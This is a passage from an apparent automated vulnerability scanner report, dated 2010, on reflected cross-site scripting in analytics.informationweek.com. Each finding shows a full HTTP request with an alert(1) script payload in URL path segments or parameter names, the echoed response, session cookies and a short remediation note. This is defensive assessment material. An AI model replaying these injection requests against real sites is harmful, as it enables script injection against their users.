User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:41:20 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:20 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45985
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... %3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E2532fb38a24&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/10/4754/Messaging-Collaboration/research-social-networking.htmlbaf9c--><script>alert(1)</script>2532fb38a24"> ...[SNIP]...
3.8. http://analytics.informationweek.com/abstract/10/4754/Messaging-Collaboration/research-social-networking.html [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 8b59d--><script>alert(1)</script>ea486472576 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstract/10/4754/Messaging-Collaboration/research-social-networking.html?8b59d--><script>alert(1)</script>ea486472576=1 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... Cscript%3Ealert%281%29%3C%2Fscript%3Eea486472576%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/10/4754/Messaging-Collaboration/research-social-networking.html?8b59d--><script>alert(1)</script>ea486472576=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 58d2b--><script>alert(1)</script>8691f40a2e4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstract58d2b--><script>alert(1)</script>8691f40a2e4/14/4774/Regulatory-Compliance/strategy-compliance.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:40:33 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:40:37 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45967
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... -%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E8691f40a2e4%2F14%2F4774%2FRegulatory-Compliance%2Fstrategy-compliance.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract58d2b--><script>alert(1)</script>8691f40a2e4/14/4774/Regulatory-Compliance/strategy-compliance.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload 47164--><script>alert(1)</script>d17787e4872 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstract/1447164--><script>alert(1)</script>d17787e4872/4774/Regulatory-Compliance/strategy-compliance.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:41:00 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:00 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45967
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 4--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ed17787e4872%2F4774%2FRegulatory-Compliance%2Fstrategy-compliance.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/1447164--><script>alert(1)</script>d17787e4872/4774/Regulatory-Compliance/strategy-compliance.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload a1c0a--><script>alert(1)</script>0b4fea96c73 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstract/14/4774a1c0a--><script>alert(1)</script>0b4fea96c73/Regulatory-Compliance/strategy-compliance.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:41:06 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:07 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45967
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... c0a--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E0b4fea96c73%2FRegulatory-Compliance%2Fstrategy-compliance.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/14/4774a1c0a--><script>alert(1)</script>0b4fea96c73/Regulatory-Compliance/strategy-compliance.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload 55c09--><script>alert(1)</script>bf3e5338c9e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstract/14/4774/Regulatory-Compliance55c09--><script>alert(1)</script>bf3e5338c9e/strategy-compliance.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:41:13 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:13 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45967
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 55c09--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ebf3e5338c9e%2Fstrategy-compliance.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/14/4774/Regulatory-Compliance55c09--><script>alert(1)</script>bf3e5338c9e/strategy-compliance.html"> ...[SNIP]...
The value of REST URL parameter 5 is copied into an HTML comment. The payload cf1ae--><script>alert(1)</script>980e8f9ba54 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstract/14/4774/Regulatory-Compliance/strategy-compliance.htmlcf1ae--><script>alert(1)</script>980e8f9ba54 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:41:21 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:21 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45967
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... mlcf1ae--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E980e8f9ba54&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/14/4774/Regulatory-Compliance/strategy-compliance.htmlcf1ae--><script>alert(1)</script>980e8f9ba54"> ...[SNIP]...
3.14. http://analytics.informationweek.com/abstract/14/4774/Regulatory-Compliance/strategy-compliance.html [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 4c7d2--><script>alert(1)</script>6d9f708ac4a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstract/14/4774/Regulatory-Compliance/strategy-compliance.html?4c7d2--><script>alert(1)</script>6d9f708ac4a=1 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... d2--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E6d9f708ac4a%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/14/4774/Regulatory-Compliance/strategy-compliance.html?4c7d2--><script>alert(1)</script>6d9f708ac4a=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 52fde--><script>alert(1)</script>8290483de10 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstract52fde--><script>alert(1)</script>8290483de10/7/4814/Enterprise-Software/it-pro-impact-report-sharepoint-2010.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:40:30 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:40:31 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45995
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 3Ealert%281%29%3C%2Fscript%3E8290483de10%2F7%2F4814%2FEnterprise-Software%2Fit-pro-impact-report-sharepoint-2010.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract52fde--><script>alert(1)</script>8290483de10/7/4814/Enterprise-Software/it-pro-impact-report-sharepoint-2010.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload 42973--><script>alert(1)</script>454e510e36f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstract/742973--><script>alert(1)</script>454e510e36f/4814/Enterprise-Software/it-pro-impact-report-sharepoint-2010.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:40:56 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:40:56 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45995
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... t%3Ealert%281%29%3C%2Fscript%3E454e510e36f%2F4814%2FEnterprise-Software%2Fit-pro-impact-report-sharepoint-2010.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/742973--><script>alert(1)</script>454e510e36f/4814/Enterprise-Software/it-pro-impact-report-sharepoint-2010.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload 4e97f--><script>alert(1)</script>fee00e08e9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstract/7/48144e97f--><script>alert(1)</script>fee00e08e9/Enterprise-Software/it-pro-impact-report-sharepoint-2010.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:41:02 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:02 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45993
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... ript%3Ealert%281%29%3C%2Fscript%3Efee00e08e9%2FEnterprise-Software%2Fit-pro-impact-report-sharepoint-2010.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/7/48144e97f--><script>alert(1)</script>fee00e08e9/Enterprise-Software/it-pro-impact-report-sharepoint-2010.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload e65d9--><script>alert(1)</script>d674e82b6c1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstract/7/4814/Enterprise-Softwaree65d9--><script>alert(1)</script>d674e82b6c1/it-pro-impact-report-sharepoint-2010.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:41:09 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:09 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45995
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... cript%3Ealert%281%29%3C%2Fscript%3Ed674e82b6c1%2Fit-pro-impact-report-sharepoint-2010.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/7/4814/Enterprise-Softwaree65d9--><script>alert(1)</script>d674e82b6c1/it-pro-impact-report-sharepoint-2010.html"> ...[SNIP]...
The value of REST URL parameter 5 is copied into an HTML comment. The payload 21610--><script>alert(1)</script>20b72df1c4 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstract/7/4814/Enterprise-Software/it-pro-impact-report-sharepoint-2010.html21610--><script>alert(1)</script>20b72df1c4 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:41:14 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:14 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45993
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 3Cscript%3Ealert%281%29%3C%2Fscript%3E20b72df1c4&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/7/4814/Enterprise-Software/it-pro-impact-report-sharepoint-2010.html21610--><script>alert(1)</script>20b72df1c4"> ...[SNIP]...
3.20. http://analytics.informationweek.com/abstract/7/4814/Enterprise-Software/it-pro-impact-report-sharepoint-2010.html [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 39828--><script>alert(1)</script>2323f7bbb5b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstract/7/4814/Enterprise-Software/it-pro-impact-report-sharepoint-2010.html?39828--><script>alert(1)</script>2323f7bbb5b=1 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... pt%3Ealert%281%29%3C%2Fscript%3E2323f7bbb5b%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/7/4814/Enterprise-Software/it-pro-impact-report-sharepoint-2010.html?39828--><script>alert(1)</script>2323f7bbb5b=1"> ...[SNIP]...
3.21. http://analytics.informationweek.com/abstract/81/4794/Business-Intelligence-and-Information-Management/three-guidelines-for-implementing-mdm.html [REST URL parameter 1]
The value of REST URL parameter 1 is copied into an HTML comment. The payload 924e1--><script>alert(1)</script>07bb1c645bd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstract924e1--><script>alert(1)</script>07bb1c645bd/81/4794/Business-Intelligence-and-Information-Management/three-guidelines-for-implementing-mdm.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
